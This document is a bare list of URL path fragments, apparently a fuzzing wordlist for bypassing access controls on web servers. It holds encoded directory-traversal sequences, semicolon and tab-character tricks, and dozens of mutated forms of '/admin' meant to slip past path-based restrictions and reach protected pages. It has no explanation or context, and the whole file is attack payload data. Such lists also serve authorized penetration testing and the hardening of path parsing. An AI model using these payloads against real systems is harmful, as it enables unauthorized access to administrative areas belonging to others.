#?
%09
%09%3b
%09..
%09;
%20
%23%3f
%252f%252f
%252f/
%2e%2e
%2e%2e/
%2f
%2f%20%23
%2f%23
%2f%2f
%2f%3b%2f
%2f%3b%2f%2f
%2f%3f
%2f%3f/
%2f/
%3b
%3b%09
%3b%2f%2e%2e
%3b%2f%2e%2e%2f%2e%2e%2f%2f
%3b%2f%2e.
%3b%2f..
%3b/%2e%2e/..%2f%2f
%3b/%2e.
%3b/%2f%2f../
%3b/..
%3b//%2f../
%3f%23
%3f%3f
..
..%00/;
..%00;/
..%09
..%0d/;
..%0d;/
..%5c/
..%ff/;
..%ff;/
..;%00/
..;%0d/
..;%ff/
..;\\
..;\;
..\;
/%20#
/%20%23
/%252e%252e%252f/
/%252e%252e%253b/
/%252e%252f/
/%252e%253b/
/%252e/
/%252f
/%2e%2e
/%2e%2e%3b/
/%2e%2e/
/%2e%2f/
/%2e%3b/
/%2e%3b//
/%2e/
/%2e//
/%2f
/%3b/
/..
/..%2f
/..%2f..%2f
/..%2f..%2f..%2f
/../
/../../
/../../../
/../../..//
/../..//
/../..//../
/../..;/
/.././../
/../.;/../
/..//
/..//../
/..//../../
/..//..;/
/../;/
/../;/../
/..;%2f
/..;%2f..;%2f
/..;%2f..;%2f..;%2f
/..;/../
/..;/..;/
/..;//
/..;//../
/..;//..;/
/..;/;/
/..;/;/..;/
/.//
/.;/
/.;//
//..
//../../
//..;
//./
//.;/
///..
///../
///..//
///..;
///..;/
///..;//
//;/
/;/
/;//
/;x
/;x/
/x/../
/x/..//
/x/../;/
/x/..;/
/x/..;//
/x/..;/;/
/x//../
/x//..;/
/x/;/../
/x/;/..;/
;
;%09
;%09..
;%09..;
;%09;
;%2F..
;%2f%2e%2e
;%2f%2e%2e%2f%2e%2e%2f%2f
;%2f%2f/../
;%2f..
;%2f..%2f%2e%2e%2f%2f
;%2f..%2f..%2f%2f
;%2f..%2f/
;%2f..%2f/..%2f
;%2f..%2f/../
;%2f../%2f..%2f
;%2f../%2f../
;%2f..//..%2f
;%2f..//../
;%2f..///
;%2f..///;
;%2f..//;/
;%2f..//;/;
;%2f../;//
;%2f../;/;/
;%2f../;/;/;
;%2f..;///
;%2f..;//;/
;%2f..;/;//
;%2f/%2f../
;%2f//..%2f
;%2f//../
;%2f//..;/
;%2f/;/../
;%2f/;/..;/
;%2f;//../
;%2f;/;/..;/
;/%2e%2e
;/%2e%2e%2f%2f
;/%2e%2e%2f/
;/%2e%2e/
;/%2e.
;/%2f%2f../
;/%2f/..%2f
;/%2f/../
;/.%2e
;/.%2e/%2e%2e/%2f
;/..
;/..%2f
;/..%2f%2f../
;/..%2f..%2f
;/..%2f/
;/..%2f//
;/../
;/../%2f/
;/../../
;/../..//
;/.././../
;/../.;/../
;/..//
;/..//%2e%2e/
;/..//%2f
;/..//../
;/..///
;/../;/
;/../;/../
;/..;
;/.;.
;//%2f../
;//..
;//../../
;///..
;///../
;///..//
;x
;x/
;x;
&
%
../
..%2f
.././
..%00/
..%0d/
..%5c
..\\
..%ff
%2e%2e%2f
.%2e/
%3f
%26
%23
%2e
/.
?
??
???
//
/./
.//./
//?anything
#
/
/.randomstring
..;/
.html
%20/
/%20${path}%20/
.json
\..\.\\
/*
./.
/*/
/..;/
/%2e/${path}
//.
////
/;${path}/
/%2f%3b/;%09%2f/
/%2f%5c%2e%2e%2f
/%3f%3b%09/
/%3b%5c%2e%2e%2f
/%5c%2e%2e%2f/
/%5c%2e/
/%3f%5c%2e/
/%3b%09%5c%2f/
/%23%5c%2e/
/%5c/
/%5c%2e%5c/
/%5c%2e%5c%2f/
/%5c%2e%5c%3b/
/%5c%3b%5c/
/%5c%2f/
/%5c..%5c/
/%5c%2e%2e/
/%5c%2f%5c/
/%5c%3b/
/%5c%23/
/%5c%3f/
/%5c%5c/
/%5c%3
/admin/?
//admin//
///admin///
/./admin/./
/admin?
/admin??
/admin??
/admin/?/
/admin/??
/admin/??/
/admin/..
/admin/../
/admin/./
/admin/.
/admin/.//
/admin/*
/admin//*
/admin/%2f
/admin/%2f/
/admin/%20
/admin/%20/
/admin/%09
/admin/%09/
/admin/%0a
/admin/%0a/
/admin/%0d
/admin/%0d/
/admin/%25
/admin/%25/
/admin/%23
/admin/%23/
/admin/%26
/admin/%3f
/admin/%3f/
/admin/%26/
/admin/#
/admin/#/
/admin/#/./
/./admin
/./admin/
/..;/admin
/..;/admin/
/.;/admin
/.;/admin/
/;/admin
/;/admin/
//;//admin
//;//admin/
/admin/./
/%2e/admin
/%2e/admin/
/%20/admin/%20
/%20/admin/%20/
/admin/..;/
/admin.json
/admin/.json
/admin..;/
/admin;/
/admin%00
/admin.css
/admin.html
/admin?id=1
/admin~
/admin/~
/admin/°/
/admin/&
/admin/-
/admin\/\/
/admin/..%3B/
/admin/;%2f..%2f..%2f
/ADMIN
/ADMIN/
/admin/..\;/
/*/admin
/*/admin/
/ADM+IN
/ADM+IN/